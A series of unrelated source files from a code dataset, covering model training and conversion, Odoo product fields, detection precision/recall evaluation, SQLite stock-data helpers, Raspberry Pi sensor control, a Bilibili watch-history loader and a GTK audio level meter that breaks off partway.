logger=log,\n max_classes_limit = config.detector_train_max_classes_num,\n one_class_min_images_num=config.detector_train_one_class_min_img_num,\n one_class_max_images_num=config.detector_train_one_class_max_img_num,\n allow_reshape = False)\n except Exception as e:\n log.e(\"train datasets not valid: {}\".format(e))\n raise Exception((TrainFailReason.ERROR_PARAM, \"datasets not valid: {}\".format(str(e))))\n try:\n\n detector.train(epochs=config.detector_train_epochs,\n progress_cb=self.__on_train_progress,\n save_best_weights_path = self.best_h5_model_path,\n save_final_weights_path = self.final_h5_model_path,\n jitter=False,\n is_only_detect = False,\n batch_size = config.detector_train_batch_size,\n train_times = 5,\n valid_times = 2,\n learning_rate=config.detector_train_learn_rate,\n )\n except Exception as e:\n log.e(\"train error: {}\".format(e))\n traceback.print_exc()\n raise Exception((TrainFailReason.ERROR_INTERNAL, \"error occurred when train, error: {}\".format(str(e)) ))\n\n # 训练结束, 生成报告\n log.i(\"train ok, now generate report\")\n detector.report(self.result_report_img_path)\n\n # 生成 kmodel\n log.i(\"now generate kmodel\")\n detector.save(tflite_path=self.tflite_path)\n detector.get_sample_images(config.sample_image_num, self.dataset_sample_images_path)\n ok, msg = self.convert_to_kmodel(self.tflite_path, self.result_kmodel_path, config.ncc_kmodel_v3, self.dataset_sample_images_path)\n if not ok:\n log.e(\"convert to kmodel fail\")\n raise Exception((TrainFailReason.ERROR_INTERNAL, \"convert kmodel fail: {}\".format(msg) ))\n\n # 拷贝模板文件\n log.i(\"copy template files\")\n template_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"detector\", \"template\")\n self.__copy_template_files(template_dir, self.result_dir)\n\n # 写入 label 文件\n replace = 'labels = [\"{}\"]'.format('\", \"'.join(detector.labels))\n with open(self.result_labels_path, \"w\") as f:\n f.write(replace)\n with open(self.result_boot_py_path) as f:\n boot_py = f.read()\n with open(self.result_boot_py_path, \"w\") as f:\n target = 'labels = [] # labels'\n boot_py = boot_py.replace(target, replace)\n target = 'anchors = [] # anchors'\n replace = 'anchors = [{}]'.format(', '.join(str(i) for i in detector.anchors))\n boot_py = boot_py.replace(target, replace)\n target = 'sensor.set_windowing((224, 224))'\n replace = 'sensor.set_windowing(({}, {}))'.format(detector.input_shape[1], detector.input_shape[0])\n boot_py = boot_py.replace(target, replace)\n f.write(boot_py)\n\n return detector, config.detector_result_file_name_prefix\n\n def __copy_template_files(self, src_dir, dst_dir):\n files = os.listdir(src_dir)\n for f in files:\n shutil.copyfile(os.path.join(src_dir, f), os.path.join(dst_dir, f))\n\n def zip_dir(self, dir_path, out_zip_file_path):\n '''\n 将目录打包成zip, 注意传的目录是根目录,是不会被打包进压缩包的,如果需要文件夹,要在这个目录下建立一个子文件夹\n root_dir\n |\n -- data_dir\n -- data1\n -- data2\n zip: \n name.zip\n |\n -- data_dir\n -- data1\n -- data2\n '''\n shutil.make_archive(os.path.splitext(out_zip_file_path)[0], \"zip\", dir_path)\n \n\n def convert_to_kmodel(self, tf_lite_path, kmodel_path, ncc_path, images_path):\n '''\n @ncc_path ncc 可执行程序路径\n @return (ok, msg) 是否出错 (bool, str)\n '''\n p =subprocess.Popen([ncc_path, \"-i\", \"tflite\", \"-o\", \"k210model\", \"--dataset\", images_path, tf_lite_path, kmodel_path], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n try:\n output, err = p.communicate( )\n res = p.returncode\n except Exception as e:\n print(\"[ERROR] \", e)\n return False, str(e)\n res = 
p.returncode\n if res == 0:\n return True, \"ok\"\n else:\n print(\"[ERROR] \", res, output, err)\n return False, f\"output:\\n{output}\\nerror:\\n{err}\"\n\nif __name__ == \"__main__\":\n # train_task = Train(TrainType.CLASSIFIER, \"../datasets/test_classifier_datasets.zip\", \"\", \"../out\")\n train_task = Train(TrainType.DETECTOR, \"../datasets/test_detector_xml_format.zip\", \"\", \"../out\")\n train_task.train()\n\n","sub_path":"train/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"534686676","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, tools, _\nfrom odoo.addons import decimal_precision as dp\n\nclass ProductTemplate(models.Model):\n _inherit = 'product.template'\n\n hide_on_print = fields.Boolean('Do Not Print', default=False)\n hs_code = fields.Char(\n string=\"HS Code\",\n help=\"Standardized code for international shipping and goods declaration. At the moment, only used for the FedEx shipping provider.\",\n )\n\nclass ProductCategory(models.Model):\n _inherit = \"product.category\"\n\n hide_on_print = fields.Boolean('Do Not Print', default=False)\n profit_center = fields.Selection(\n [('Disassembly', 'Disassembly'), ('Machine Shop', 'Machine Shop'), ('Winding', 'Winding'), ('Assembly', 'Assembly'), ('Field Services', 'Field Services'), ('New Product Sales', 'New Product Sales'), ('Storage', 'Storage'), ('Training', 'Training')], string='Profit Center')\n\nclass ProductPricelistItem(models.Model):\n _inherit = 'product.pricelist.item'\n\n rebate_amount = fields.Float('Rebate Amount', digits=dp.get_precision('Product Price'))\n \nclass ProductProduct(models.Model):\n _inherit = 'product.product'\n\n @api.model\n def _anglo_saxon_sale_move_lines(self, name, product, uom, qty, price_unit, currency=False, amount_currency=False, fiscal_position=False, account_analytic=False, analytic_tags=False):\n res = super()._anglo_saxon_sale_move_lines(\n name,\n product,\n uom,\n qty,\n price_unit,\n currency=currency,\n amount_currency=amount_currency,\n fiscal_position=fiscal_position,\n account_analytic=account_analytic,\n analytic_tags=analytic_tags,\n )\n if res:\n res[0]['account_analytic_id'] = account_analytic and account_analytic.id\n res[0]['analytic_tag_ids'] = analytic_tags and analytic_tags.ids and [(6, 0, analytic_tags.ids)] or False\n return res\n\n","sub_path":"ssi_jobs/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"244309619","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport os\nimport sys\nimport numpy as np\nimport cv2\nimport math\nos.environ[\"GLOG_minloglevel\"] = \"2\"\nimport caffe\nimport copy\n\ndet_net =\"./deploy.prototxt\"\ndet_model = \"./vgg280half_raw/vgg_iter_22000.caffemodel\"\ngpu_id = 2\ntest_image_list=\"../data_new/test_image_all.txt\" #465张测试集\n#test_image_list=\"../data_new/test_image_path.txt\" #1239张测试集\nconf_thres = float(0.3)\ndetection_out_path = \"./detection_out/\"\n\nif gpu_id < 0:\n caffe.set_mode_cpu()\nelse:\n caffe.set_mode_gpu()\n caffe.set_device(gpu_id)\n# det caffe\ndet_caffe = caffe.Net(det_net, det_model, caffe.TEST)\n\ndet_caffe_channel, det_caffe_height, det_caffe_width = det_caffe.blobs['data'].data.shape[1:]\ndet_caffe.blobs[\"data\"].reshape(1, det_caffe_channel, det_caffe_height, det_caffe_width)\n\ndet_trans = 
caffe.io.Transformer({\"data\": det_caffe.blobs[\"data\"].data.shape})\ndet_trans.set_transpose(\"data\", (2, 0, 1))\ndet_trans.set_raw_scale('data', 255)\ndet_trans.set_mean(\"data\", np.array([104, 117, 123]))\ndet_trans.set_channel_swap('data', (2, 1, 0))\n\np=0\nwith open(test_image_list, \"r\") as il:\n    for line in il:\n        #image_path = \"../data_new/dataset/VOC_Car_Images_and_Labels/\"+line.strip(\"\\n\")\n        image_path = \"../data_new/test_img_y/\"+line.strip(\"\\n\")\n        cv_image = cv2.imread(image_path)\n        if cv_image is None:\n            print(\"Error: Image is None. %s\" % image_path)\n            continue\n        image_height, image_width = cv_image.shape[:2]\n\n        # detect\n        det_caffe.blobs[\"data\"].data[...] = det_trans.preprocess(\"data\", caffe.io.load_image(image_path))\n        det_caffe_output = det_caffe.forward()\n        det_results = det_caffe_output[\"detection_out\"][0][0].copy()\n        num_results = 0\n        fo = open(detection_out_path + line.replace(\".jpg\\n\",\".txt\"), \"w\")\n        for i in range(det_results.shape[0]):\n            conf = det_results[i][2]\n            if conf < conf_thres:\n                continue\n            num_results += 1\n            bbox_xmin = det_results[i][3] * image_width\n            bbox_ymin = det_results[i][4] * image_height\n            bbox_xmax = det_results[i][5] * image_width\n            bbox_ymax = det_results[i][6] * image_height\n\n            d=[str(int(math.ceil(conf))) +' ',str(int(bbox_xmin)) +' ',str(int(bbox_ymin)) +' ',str(int(bbox_xmax)) +' ',str(int(bbox_ymax)) +'\\n']\n            fo.writelines(d)\n            #print(\"Conf: %f BBox: %f %f %f %f\" % (conf, bbox_xmin, bbox_ymin, bbox_xmax, bbox_ymax))\n        p=p+1\n        print(\"loading......\" + str(p) + \" picture\")\n        fo.close()\n        #print(\"Image: %s %d\" % (image_path, num_results))\n\ndef IOU(x_labels, y_labels, w_labels, h_labels, x_detection, y_detection, w_detection, h_detection):\n    x_iou = max(x_labels, x_detection)\n    y_iou = max(y_labels, y_detection)\n    w_iou = min(w_labels, w_detection)\n    h_iou = min(h_labels, h_detection)\n    S_labels = (w_labels - x_labels)*(h_labels - y_labels)\n    S_detection = (w_detection - x_detection)*(h_detection - y_detection)\n    w = w_iou - x_iou\n    h = h_iou - y_iou\n    if w < 0 or h < 0:\n        return 0\n    else:\n        S_iou = w * h\n        iou = S_iou / float((S_labels + S_detection - S_iou))\n        return iou\n\n\n\nA = 0 # detections that matched a ground-truth object\nB = 0 # ground-truth objects that were not detected\nC = 0 # detections that matched no ground-truth object\n#test_image_list = \"C:\\\\Users\\\\shzhoujun\\\\Desktop\\\\testmodels\\\\test_all_image_path.txt\"\nwith open(test_image_list, \"r\") as il:\n    for line in il:\n        test_labs_path = \"../data_new/testlabs/\" + line.replace(\".jpg\\n\",\".txt\")\n        detection_out_p = \"./detection_out/\" + line.replace(\".jpg\\n\",\".txt\")\n        with open(detection_out_p, \"r\") as dp:\n            dp = dp.readlines()\n            dp1 = copy.deepcopy(dp) # working copy that matched entries are removed from\n        with open(test_labs_path, \"r\") as lp:\n            lp = lp.readlines()\n            lp1 = copy.deepcopy(lp) # working copy that matched entries are removed from\n\n        for d in dp:\n            # nothing at all was detected in this image\n            if len(dp) == 0:\n                B = B + len(lp)\n                break\n            # some objects were detected\n            else:\n                d_new = d.split(' ') # split the line on spaces\n                for l in lp1:\n                    l_new = l.split(' ')\n                    iou = IOU(int(l_new[1]), int(l_new[2]), int(l_new[3]), int(l_new[4]), int(d_new[1]), int(d_new[2]),\n                              int(d_new[3]), int(d_new[4]))\n                    if iou >= 0.5:\n                        A = A + 1 # detected a correct object\n                        lp1.remove(l)\n                        dp1.remove(d)\n                        break\n\n        C = C + len(dp1) # detections of wrong objects (not in the ground truth)\n        B = B + len(lp1) # objects that were never detected\n\n\nprint(\"precision = \", A / float((A + C)))\nprint(\"recall = \", A / float((A + B)))\nprint( A)\nprint( B)\nprint( 
C)\n\n\n","sub_path":"V1_vgg/V1_vgg280_half_raw/precision_recall.py","file_name":"precision_recall.py","file_ext":"py","file_size_in_byte":5054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"206276443","text":"import sqlite3\nfrom datetime import datetime\n\n\ndef connect(db_filename):\n conn = sqlite3.connect(db_filename)\n c = conn.cursor()\n return conn, c\n\ndef close(conn):\n conn.close()\n\ndef createDb(db_filename):\n conn = sqlite3.connect(db_filename)\n conn.commit()\n conn.close()\n\ndef createTable(db_filename, table_name, col_names, col_types):\n if len(col_names) != len(col_types):\n raise ValueError('number of names and number of types does not match.')\n entries = '\\n'\n for name, col_type in zip(col_names, col_types):\n entries += str(name) + ' ' + str(col_type) + ',\\n'\n if len(entries) > 1:\n entries = entries[:-2] # remove the last ',\\n'\n sql_str = 'CREATE TABLE {0} ({1})'.format(table_name, entries)\n conn = sqlite3.connect(db_filename)\n c = conn.cursor()\n c.execute(sql_str)\n conn.commit()\n conn.close()\n\ndef getTableColumns(db_filename, table_name):\n conn = sqlite3.connect(db_filename)\n c = conn.cursor()\n sql_str = \"SELECT * FROM {}\".format(table_name)\n c.execute(sql_str)\n names = [description[0] for description in c.description]\n conn.close()\n return names\n\ndef addOHLCVRow(db_filename, table_name,\n ticker='NAN', date=None,\n o=-1, h=-1, l=-1, c=-1, v=-1):\n conn = sqlite3.connect(db_filename)\n c = conn.cursor()\n if date is not None:\n sql_str = 'INSERT INTO {}(ticker, date, open, high, low, close, volume)' \\\n 'VALUES(?,?,?,?,?,?,?)'.format(table_name)\n c.execute(sql_str, (ticker, date, o, h, l, c, v))\n conn.commit()\n conn.close()\n else:\n conn.close()\n raise ValueError('date is None.')\n\ndef addOHLCVData(db_filename, table_name, new_values):\n conn = sqlite3.connect(db_filename)\n cursor = conn.cursor()\n cursor.execute('SELECT COUNT(*) FROM {}'.format(table_name))\n count = cursor.fetchall()\n sql_str = 'INSERT INTO {} VALUES(?,?,?,?,?,?,?)'.format(table_name)\n if count == 0:\n cursor.executemany(sql_str, new_values) # assuming already sorted by date\n else:\n sql_last_row_str = 'SELECT * FROM {} ORDER BY date(date) DESC LIMIT 1'.format(table_name)\n cursor.execute(sql_last_row_str)\n last_row = cursor.fetchone()\n last_date_str = last_row[1]\n last_date = datetime.strptime(last_date_str, '%m-%d-%y')\n for i, val in enumerate(new_values):\n this_date = datetime.strptime(val[1], '%m-%d-%y') \n this_date > last_date\n break\n new_values = new_values[i:]\n cursor.executemany(sql_str, new_values) # assuming already sorted by date\n conn.commit()\n conn.close()\n","sub_path":"data_getter/save_data.py","file_name":"save_data.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"243084967","text":"import sys\nimport time\nimport RPi.GPIO as GPIO\nimport time\nimport Adafruit_DHT\n\nLED = 27\nsensor = 22\npin = 17\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(LED, GPIO.OUT)\nGPIO.output(LED, False)\n\nhumidity, temperature = Adafruit_DHT.read_retry(sensor, pin)\n\n\ndef askUserTemperature():\n value = int(\n input(\"Choose your temperature in degre Celsius [0...A lot]: \"))\n return value\n\n\ntemperatureToDoNotReach = askUserTemperature()\n\nwhile True:\n if humidity is not None and temperature is not None:\n if (temperature > temperatureToDoNotReach):\n GPIO.output(LED, True)\n else:\n 
GPIO.output(LED, False)\n    else:\n        print('Failed to get reading. Try again!')\n    time.sleep(2)\n","sub_path":"7_ask_temperature_led.py","file_name":"7_ask_temperature_led.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"619406525","text":"# In Python, to turn a 32-bit unsigned integer into bytes (a bytes object of length 4), you have to combine bitwise operators and write this\nn = 10240099\nb1 = (n & 0xff000000) >> 24\nb2 = (n & 0xff0000) >> 16\nb3 = (n & 0xff00) >> 8\nb4 = n & 0xff\nbs = bytes([b1, b2, b3, b4])\nprint(bs) # b'\\x00\\x9c@c'\n\n\n\"\"\"\nVery cumbersome, and it is no help at all for floating-point numbers.\nFortunately, Python provides the struct module to handle conversion between bytes and other binary data types.\n\nstruct's pack function turns any data type into bytes:\n\"\"\"\nimport struct\n\nprint(struct.pack('>I', 10240099)) # b'\\x00\\x9c@c'\n\n\"\"\"\nThe first argument of pack is the format string. In '>I', '>' means the byte order is big-endian (network order), and 'I' means a 4-byte unsigned integer.\nThe number of arguments that follow must match the format string.\n\nunpack turns bytes back into the corresponding data types:\nper the '>IH' format, the bytes that follow become I: a 4-byte unsigned integer and H: a 2-byte unsigned integer\n\"\"\"\nprint(struct.unpack('>IH', b'\\xf0\\xf0\\xf0\\xf0\\x80\\x80')) # (4042322160, 32896)\n\n\n\n\n\n\n","sub_path":"pystudy/build_in_module/_struct.py","file_name":"_struct.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"309320323","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*- \n\nimport csv\nimport torch\nimport numpy as np\nimport random\nfrom torch import nn\nfrom torch import optim\nfrom torch.autograd import Variable\nfrom imblearn.over_sampling import SMOTE\nfrom imblearn.over_sampling import RandomOverSampler\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(device)\n\nclass Rnn(nn.Module):\n    def __init__(self, in_dim, hidden_dim, n_layer, n_class):\n        super(Rnn, self).__init__()\n        self.n_layer = n_layer\n        self.hidden_dim = hidden_dim\n        self.lstm = nn.LSTM(in_dim, hidden_dim, n_layer,\n                            batch_first=True)\n        self.classifier = nn.Linear(hidden_dim, n_class)\n\n    def forward(self, x):\n        # h0 = Variable(torch.zeros(self.n_layer, x.size(1),\n        #                           self.hidden_dim)).cuda()\n        # c0 = Variable(torch.zeros(self.n_layer, x.size(1),\n        #                           self.hidden_dim)).cuda()\n        out, (h_n,h_c) = self.lstm(x, None)\n        out = out[:, -1, :]\n        out = self.classifier(out)\n        return out\n\ndef dataReader(sub, task):\n    Input = []\n    label = []\n    path_label = '/home/zmx/ds002311/event/'\n    for t in task:\n        path_input = '/home/zmx/ds002311/preprocessed_4D/' + t + '/'\n        for i in sub:\n            if i < 10:\n                num = 'sub-0' + str(i)\n            else:\n                num = 'sub-' + str(i)\n\n            input_name = num + '_' + t\n            if t == 'mot_1':\n                label_name = num + '_func_' + num + '_task-mot_run-01_events'\n            elif t == 'mot_2':\n                label_name = num + '_func_' + num + '_task-mot_run-02_events'\n            elif t == 'mot_3':\n                label_name = num + '_func_' + num + '_task-mot_run-03_events'\n            else:\n                label_name = num + '_func_' + num + '_task-' + t + '_events'\n\n            data = csv.reader(open(path_input + input_name + '.csv'))\n            with open(path_label + label_name + '.tsv','rt') as csvfile:\n                reader = csv.DictReader(csvfile, delimiter='\\t')\n                cond = [row['cond'] for row in reader]\n                for i in range(len(cond)):\n                    if cond[i] == 'targ_easy':\n                        cond[i] = 0\n                    elif cond[i] == 'targ_hard':\n                        cond[i] = 1\n                    elif cond[i] == 'lure_hard':\n                        cond[i] = 2\n                label.extend(cond)\n\n    label = list(label)\n    data = list(data)\n    del data[0:13] # start at the 13th time point: drop the header row and the first 12 time points\n    del label[24] # the last time segment is incomplete\n    float_data = []\n    for each in data:\n        each_line=list(map(lambda x: float(x), each))\n        float_data.append(each_line)\n\n    for i in range(24): # the last time segment is incomplete\n        
Input.append(float_data[16*i:16*i+16])\n    Input = np.array(Input)\n    label = np.array(label)\n    return Input, label\n\n#sub = [1,3,5,6,7,8,9,10,13,14,15,18,21,22,23]\n#task = ['loc','mot_1','mot_2','mot_3','prememory','postmemory']\ntrain_x, train_y = dataReader([6],['mot_1','mot_2','mot_3'])\ntest_x, test_y = dataReader([6],['mot_1'])\ntest_x = torch.from_numpy(test_x)\ntest_x = torch.tensor(test_x, dtype=torch.float32)\ntest_y = torch.from_numpy(test_y)\n\nsmo = SMOTE(random_state=42) # SMOTE to balance the unequal class counts\nnsamples, nx, ny = train_x.shape\nd2_train_dataset = train_x.reshape((nsamples,nx*ny))\ntrain_x_smo, train_y_smo = smo.fit_sample(d2_train_dataset, train_y)\ntrain_x_smo = train_x_smo.reshape(len(train_x_smo), nx, ny)\n\nepochs = 100\nsequence_length = 16\ninput_size = 28\n\nrnn = Rnn(28, 256, 2, 3) # 28 brain regions, sequence length 16, 2 LSTM layers, 3 classes\nrnn.to(device)\n\n# define the loss and optimizer\noptimizer = optim.Adam(rnn.parameters(), lr=0.02)\ncriterion = nn.CrossEntropyLoss()\n\n# training\nfor epoch in range(epochs):\n    state = np.random.get_state()\n    np.random.shuffle(train_x_smo)\n    np.random.set_state(state)\n    np.random.shuffle(train_y_smo)\n    data_x = torch.from_numpy(train_x_smo)\n    data_x = torch.tensor(data_x, dtype=torch.float32)\n    data_y = torch.from_numpy(train_y_smo)\n\n    i = 1\n\n    for b_x, b_y in zip(data_x,data_y):\n        b_x = b_x.reshape(-1, sequence_length, input_size)\n        b_y = b_y.reshape(-1)\n        b_x, b_y = b_x.to(device), b_y.to(device)\n        output = rnn(b_x)\n        loss = criterion(output,b_y)\n        optimizer.zero_grad()\n        loss.backward()\n        optimizer.step()\n    print(loss)\n\n\n# testing\nwith torch.no_grad():\n    correct = 0\n    total = 0\n    for t_x, t_y in zip(test_x, test_y):\n        t_x = t_x.reshape(-1, sequence_length, input_size)\n        t_y = t_y.reshape(-1)\n        t_x, t_y = t_x.to(device), t_y.to(device)\n        output = rnn(t_x)\n        _, predicted = torch.max(output.data, 1)\n        total += t_y.size(0)\n        correct += (predicted == t_y).sum().item()\n    print('Test Accuracy of the model: {} %'.format(100 * correct / total))","sub_path":"LSTM_difficulty.py","file_name":"LSTM_difficulty.py","file_ext":"py","file_size_in_byte":5103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"573710172","text":"import django\ndjango.setup()\nfrom sefaria.model import *\nfrom bs4 import BeautifulSoup\nfrom sources.functions import get_index_api, post_index\nfile = open(\"alt_struct_sichot_avodat_levi.xml\")\nsoup = BeautifulSoup(file)\nnodes = []\nindex = get_index_api(\"Sichot Avodat Levi\", server=\"http://draft.sefaria.org\")\nelements = [el for el in soup.find(\"opml\").contents[3:] if el != \"\\n\"]\nfor el in elements:\n    parsha_he, parsha_en = el.attrs[\"text\"].split(\" / \")\n    parsha_node = SchemaNode()\n    parsha_node.add_primary_titles(parsha_en, parsha_he)\n    for child in [child for child in el.contents if child != \"\\n\"]:\n        he, en = child.attrs[\"text\"].split(\" / \")\n        ref = en.replace(\"Section \", \"\")\n        child_node = ArrayMapNode()\n        child_node.add_primary_titles(en, he)\n        child_node.depth = 0\n        child_node.refs = []\n        child_node.wholeRef = \"Sichot Avodat Levi {}\".format(ref)\n        parsha_node.append(child_node)\n    parsha_node.validate()\n    nodes.append(parsha_node.serialize())\nindex[\"alt_structs\"] = {\"Parasha\": {\"nodes\": nodes}}\npost_index(index, 
server=\"http://draft.sefaria.org\")\n\n","sub_path":"sources/Content_Quality/alt_struct_sichot_avodat_levi.py","file_name":"alt_struct_sichot_avodat_levi.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"432120351","text":"#Autor: Karla Ximena Rueda Ruiz\n#Códigos correspondientes a los programas de la Misión 8\n\nentrada=[]\nsalida = []\ndef combinarLetras(entrada):\n salida = []\n for(i) in range (0,len(entrada)):\n if (i%2 == 0):\n salida.append(entrada[i].upper())\n else:\n salida.append(entrada[i].lower())\n return (salida)\nprint(combinarLetras(\"Hola\"))\n\n\nlista=[]\na = 0\ndef contieneLasVocales(lista):\n a = 0\n voc=[\"a\",\"e\",\"i\",\"o\",\"u\"]\n for (low)in range(0,len(voc)):\n if (voc[low]in lista):\n a = a + 1\n if a == 5:\n return True\n else:\n return False\n\nprint(contieneLasVocales(\"Ximena\"))\n\n\ndef formarNombreUsuario(nombre,apellido,matr):\n nom=nombre.lower()\n ape=apellido.lower()\n matricula=str(matr)\n usuario=nom[:3]+ape[:3]+matricula[-3:]\n return(usuario)\n\nprint(formarNombreUsuario(\"Karla\",\"Rueda\",1745943))\n\ndef esCorrecto(cadena):\n\n palabras=cadena.split()\n nombre=palabras[0]\n resto=nombre[1:]\n letra=nombre[0]\n if letra.isupper()==True:\n\n if resto.islower()==True:\n apellidop = palabras[1]\n restop = apellidop[1:]\n letraP = apellidop[0]\n\n\n if letraP.isupper()==True:\n\n if restop.islower()==True:\n apellidom = palabras[2]\n restom = apellidom[1:]\n letraM = apellidom[0]\n if letraM.isupper()==True:\n if restom.islower()==True:\n return True\n\n else:\n return False\n\n else:\n return False\n\n else:\n return False\n else:\n return False\n\n else:\n return False\n else:\n return False\n\nprint(esCorrecto(\"Karla Rueda Ruiz\"))\n\ndef traducirTelefono(t):\n print(t)\n t = list(t)\n i = 6\n while i >= 6 and i <= 13:\n L = t[i]\n if L == \"A\" or L == \"B\" or L == \"C\":\n t[i] = \"2\"\n elif L == \"D\" or L == \"E\" or L == \"F\":\n t[i] = \"3\"\n elif L == \"G\" or L == \"H\" or L == \"I\":\n t[i] = \"4\"\n elif L == \"J\" or L == \"K\" or L == \"L\":\n t[i] = \"5\"\n elif L == \"M\" or L == \"N\" or L == \"O\":\n t[i] = \"6\"\n elif L == \"P\" or L == \"Q\" or L == \"R\" or L == \"S\":\n t[i] = \"7\"\n elif L == \"T\" or L == \"U\" or L == \"V\":\n t[i] = \"8\"\n elif L == \"W\" or L == \"X\" or L == \"Y\" or L == \"Z\":\n t[i] = \"9\"\n\n i += 1\n\n print(\"\".join(t))\n\n\nt = \"01800-VOY-BIEN\"\ntraducirTelefono(t)\n\n","sub_path":"Misión_08.py","file_name":"Misión_08.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"17538041","text":"import time\nfrom collections import defaultdict\nfrom http.cookies import SimpleCookie\n\nimport pendulum\nimport requests\n\nfrom .base_loader import BaseLoader\nfrom .config import BILIBILI_HISTORY_URL\n\n\nclass BilibiliLoader(BaseLoader):\n def __init__(self, from_year, to_year, **kwargs):\n super().__init__()\n self.from_year = from_year\n self.to_year = to_year\n self.number_by_date_dict = defaultdict(int)\n self.session = requests.Session()\n self.bilibili_cookie = kwargs.get(\"bilibili_cookie\", \"\")\n self._make_years_list()\n\n def _parse_bilibili_cookie(self):\n cookie = SimpleCookie()\n cookie.load(self.bilibili_cookie)\n cookies_dict = {}\n cookiejar = None\n for key, morsel in cookie.items():\n cookies_dict[key] = morsel.value\n cookiejar = requests.utils.cookiejar_from_dict(\n 
cookies_dict, cookiejar=None, overwrite=True\n )\n return cookiejar\n\n def get_api_data(self, max_oid=\"\", view_at=\"\", data_list=[]):\n r = self.session.get(\n BILIBILI_HISTORY_URL.format(max_oid=max_oid, view_at=view_at)\n )\n if not r.ok:\n raise Exception(\n \"Can not get bilibili history data, please check your cookie\"\n )\n data = r.json()[\"data\"]\n if not data[\"list\"]:\n return data_list\n l = data[\"list\"]\n max_oid = l[-1][\"history\"][\"oid\"]\n view_at = l[-1][\"view_at\"]\n data_list.extend(l)\n # spider rule\n time.sleep(0.1)\n return self.get_api_data(max_oid=max_oid, view_at=view_at, data_list=data_list)\n\n def make_track_dict(self):\n data_list = self.get_api_data()\n for d in data_list:\n date_str = pendulum.from_timestamp(\n d[\"view_at\"], tz=self.time_zone\n ).to_date_string()\n self.number_by_date_dict[date_str] += 1\n for _, v in self.number_by_date_dict.items():\n self.number_list.append(v)\n\n def get_all_track_data(self):\n # first we need to activate the session with cookie str from `chrome`\n self.session.cookies = self._parse_bilibili_cookie()\n\n self.make_track_dict()\n self.make_special_number()\n return self.number_by_date_dict, self.year_list\n","sub_path":"loader/bilibili_loader.py","file_name":"bilibili_loader.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"2009225","text":"import math\nimport cairo\n\nfrom lib.config import Config\nfrom gi.repository import Gtk, GLib, Gst\n\n\nclass AudioLevelDisplay(Gtk.DrawingArea):\n \"\"\"Displays a Level-Meter of another VideoDisplay into a GtkWidget\"\"\"\n __gtype_name__ = 'AudioLevelDisplay'\n\n def __init__(self):\n self.num_audiostreams_ = int(Config.get('mix', 'audiostreams'))\n meters = Config.get('mainvideo', 'vumeter')\n if (meters != 'all') and (int(meters) < self.num_audiostreams_):\n self.num_audiostreams_ = int(meters)\n\n self.channels = 2\n acaps = Gst.Caps.from_string(Config.get('mix', 'audiocaps'))\n self.channels = int(acaps.get_structure(0).get_int(\"channels\")[1])\n\n self.levelrms = [0] * self.channels * self.num_audiostreams_\n self.levelpeak = [0] * self.channels * self.num_audiostreams_\n self.leveldecay = [0] * self.channels * self.num_audiostreams_\n\n self.height = -1\n\n self.set_size_request(20 * self.num_audiostreams_, -1)\n\n # register on_draw handler\n self.connect('draw', self.draw_callback)\n\n # generate gradient from green to yellow to red in logarithmic scale\n def gradient(self, brightness, darkness, height):\n # prepare gradient\n lg = cairo.LinearGradient(0, 0, 0, height)\n # set gradient stops\n lg.add_color_stop_rgb(0.0, brightness, darkness, darkness)\n lg.add_color_stop_rgb(0.22, brightness, brightness, darkness)\n lg.add_color_stop_rgb(0.25, brightness, brightness, darkness)\n lg.add_color_stop_rgb(0.35, darkness, brightness, darkness)\n lg.add_color_stop_rgb(1.0, darkness, brightness, darkness)\n # return result\n return lg\n\n def draw_callback(self, widget, cr):\n # number of audio-channels\n channels = len(self.levelrms)\n\n if channels == 0:\n return False\n\n width = self.get_allocated_width()\n height = self.get_allocated_height()\n\n # space between the channels in px\n margin = 2\n\n # 1 channel -> 0 margins, 2 channels -> 1 margin, 3 channels…\n channel_width = int((width - (margin * (channels - 1))) / channels)\n\n # self.log.debug(\n # 'width: %upx filled with %u channels of each %upx '\n # 'and %ux margin of %upx',\n # width, channels, 
